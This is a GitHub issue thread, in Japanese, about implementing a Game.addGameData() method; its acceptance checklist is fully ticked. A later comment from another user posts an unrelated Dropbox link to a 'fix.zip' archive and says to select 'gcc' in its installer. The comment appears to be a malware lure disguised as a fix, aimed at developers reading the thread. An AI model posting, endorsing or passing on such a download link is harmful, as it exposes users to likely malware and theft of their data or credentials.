### ISSUE TITLE
Game.addGameData() の中身を作成する

### ISSUE THREAD

**Issue by Maron32** [LastAgileProject/LastAgileRepository#11]
### 何をやるのか・なぜやるのか

Game.addGameData() の中身を作成する

## 受入条件 

- [x] エラーが出ない

- [x] 正しい戻り値が返ってくる

# タスク 

- [x] addGameData()の中身を作成する

## その他

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
